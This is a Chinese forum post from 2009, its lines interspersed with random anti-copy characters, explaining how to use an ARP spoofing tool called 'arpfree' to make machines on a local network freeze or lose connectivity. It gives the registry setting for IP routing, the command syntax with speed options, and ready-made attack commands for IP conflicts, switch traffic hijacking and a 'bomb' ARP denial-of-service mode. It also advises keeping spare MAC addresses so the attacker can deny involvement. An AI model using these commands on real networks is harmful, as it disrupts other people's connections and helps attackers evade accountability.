TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
本帖最后由 秋风舞落叶 于 2009-11-26 22:08 编辑
. R/ @: t- |; z) D9 |9 x* x
$ w! S8 _$ [ [- A& n: S' Z- K. V事先声明,如果出了什么问题,可别找我哦 祝你们好运。提示:准备两个MAC地址,这样就算找到你不承认就OK了,IP是随时可以换的,MAC可不是随便换的哦!
4 v4 P8 e; K$ _ A教你让内网任何一台电脑死机,如果你有大量的计算机效果更好!
6 w) M4 d' s. X: M开始忘记说了,要使用ARP欺骗,必须启动ip路由功能,修改(添加注册表选项:8 w7 b0 h1 R+ h. Q; v" f: k9 X. {" [
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
3 ^7 q5 ~3 J A, Q% H有的朋友发现打开网卡失败,原因可能就是这个.
# G2 c& o1 t j/ f+ h# [发送的时候可以选择ARP的TYPE。如果是ARP请求报文,则只要输入要问的IP地址
, Q3 S2 L7 v5 J1 q* V5 Z: u如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址
1 }1 x* u4 C2 _8 S% A: h最后的发送速度可选参数为:(大小写敏感..我觉得挺不好的)5 m* Y% n7 F6 `5 a5 {( z; Q
fast----------最快: G' o, d# \) @
hear---------每60MS一个包(可能是比较适合结合SNIFFER做监听)! b' u, p6 p( _
slowhear---每500MS一个包6 `' D' |, u2 R
auto---------每1秒一个包
: y& V) G! _7 u- L8 P# A5 Z8 S- vslow---------每2秒个包0 Y8 ?5 J1 t1 \# h1 @) I; T
使用方法如下:
" }4 j) F2 c) V( r t, _***********************************************************************
9 K- u8 J$ Y% X& I! K0 b* (1)Send arp packet in "request mode" Examples: 2 m) d, C5 K: {# M
* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
( t# s: L% |/ ~& R5 d) E6 N* | | | | | 8 L" ~- N- |( D \1 F) W
* your mac address | | | |
. f7 Y; Y8 ~2 h, I( q* v9 H* destnation mac | | speed 8 {" U( o" ^7 H' h" O7 j- W5 a& H
* arp type | # t. L( }* R, r9 E# H* C1 X
* | ) U s' N" J" W8 [
* your ip address
3 T( c3 [: `, ]3 b***********************************************************************. p h3 |4 I7 g) Y# P( |
* (2)Send arp packet in "reply mode" Examples:
: c: L5 I f& e* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto 1 C: L' V) r# u& |6 Q
* | | | | | | ) R t' {' U& ^7 s; ]- f
* your mac address | | | | |
! e- @0 K1 ? q$ |* destnation mac | | | speed
! T5 E1 H- ^9 e2 ]% n: ^+ b* arp type | |
+ ] K: r( m4 |% P* | |
0 y6 k# }! \! L$ n! t$ E7 j; ^$ ?* your ip address | ' p/ g$ |/ j+ i$ r( X
* |
! B0 o! ~# a2 P; ]9 C# p$ l3 C* the ip address of destnation mac
8 b# L' b) e& i/ M3 J9 y+ o; p***********************************************************************8 o! |5 n: P6 v' C% [/ Z( B5 D
补充:反击“LAN终结者”的办法:& K, f, R+ f$ H6 B5 [5 ^) @: g$ b4 x
反击“终结者”有几个办法:
& Z, X# t4 `- g' E3 U" P; J1:发动比他更强烈的攻击:4 s: J8 g* Y# s1 \9 e
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
+ d/ r' Q- {( E) L+ a|- Y5 V7 i) z9 j5 ~) C
|$ a1 o* U! b! m9 p7 y
这里是你想攻击的人的IP地址
9 D; O/ j; X, t# q$ c/ V- E- V5 w2:交换机竞争:
, z" J+ o0 B+ g! marpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast$ _0 x. P% R7 u/ |5 {( ]9 F
|% a8 n7 C* z$ v6 p. A
|
& h/ O' ^3 I- N5 l' W这里是你想攻击的人的MAC地址
+ `9 t& J6 {+ b! e& t1:情况将导致他IP地址冲突(比“终结者”来的猛烈多了)
' E4 t" \5 G2 A7 p/ [2:情况将使得他无法连接网络由于交换机把他的流量都给你了)& q2 C+ B. F7 L% S2 @
———————————更-----新----消-----息————————————————————— g" x; U- ~2 F! P; e; y, Q' t* m
因为有朋友反映在非交换环境下,如使用HUB的情况下,无法对目标进行打击/ r1 u F3 Z f$ ?- C9 r
增加参数“bomb”,使用方法如下:
0 }4 X# |( B6 U3 h- K$ J$ n/ p假设,目标为IP:192.168.237.109 目标mac为:011a8575a436# y' c5 D9 P' ]) t6 U4 u% ?3 a
攻击命令如下:& X% ~2 J! U/ N9 o6 v6 i' i* w
arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb
. }/ ?7 U6 v7 i; A+ |6 V7 b3 Q其实就是进行简单的ARP DOS攻击,快速刷新目标的ARP缓存,可以在消耗自身较少系统资源的情况下
( p, h9 k$ k- S4 `/ H造成和PDOS工具类似的效果,并且如果你不停止攻击,对方重启以后也无法正常进入系统( s# P8 D3 g( s: m" ?/ n
(当然前提是他没拔网线)。 |
|
/1 
IP卡
狗仔卡
发表于 2009-11-26 10:26:56
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡